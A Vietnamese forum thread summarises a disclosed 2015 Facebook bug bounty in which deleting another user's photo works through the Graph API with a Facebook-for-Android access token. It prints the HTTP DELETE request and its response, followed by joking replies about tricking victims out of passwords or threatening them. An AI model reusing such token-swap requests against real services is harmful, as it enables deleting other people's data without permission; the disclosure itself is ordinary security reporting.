[English] Facebook thưởng 12500 USD cho người tìm ra cách xóa album của người khác

Tóm tắt: Graph API không cho phép developer xóa hình của người khác, những hình và album được public ra bên ngoài.

Anh này thử xóa, và nhận được thông báo lỗi

Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

Nhưng thông báo lỗi lại nó là ứng dụng này không có khả năng sử dụng API call này. Suy ra là có ứng dụng khác có thể gọi API. Anh này thử với android mobile thì được

Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>

Response :-
true

Report và lãnh tiền thôi.

Blog: http://www.7xter.com/2015/02/how-i-hacked-your-facebook-photos.html

Video:

Bằng chứng:

‘3’ kết bạn victim.
Pm này nỉ xin pass victim
Vô nick victim. Xóa hình và report cho fb

trời anh drgnz Drgn quá đạo/ xin song 50%
12500/2 lá lá la

Có nhiều cách mà =)), dụng cụ cũng không có gì mắc cả, cái búa, dao, rựa… cũng tầm vài chục ngàn thôi. Cứ thế mà xách tới victim rồi xử lý =)) lên Facebook đòi thưởng.

Kiếm tiền dễ level Facebook =))

Hợp tác rồi chia 2 như @maichanchinhls đỡ mang họa vào thân :v
6250 cũng nhiều r =))))

Tất nhiên là nếu victim là người vn thì nó không chịu 50/50 đâu, nếu hiền phải 70 - 80 gì đấy =))
Mà nếu như làm theo cách của bác @maichanchinhls thì cao nhất chỉ đc 50%.

Của mình đc tới 100% mà =)), trừ đi chi phí các công cụ trên thì cũng còn nhiều :))

Đệt… Có thời gian mình nghịch Graph API suốt mấy tháng liền mà không thử làm vụ này nhỉ. Tiền dễ kiếm ghê

hehe, ăn thua hên xui. Nhiều khi nó nghĩ chơi chơi mà cuối cùng lại làm được. Cái lỗi này đâu khó để exploit đâu. Đùng một phát có 266 triệu ăn tết

I moved 4 posts to an existing topic: Off-topics will be moved here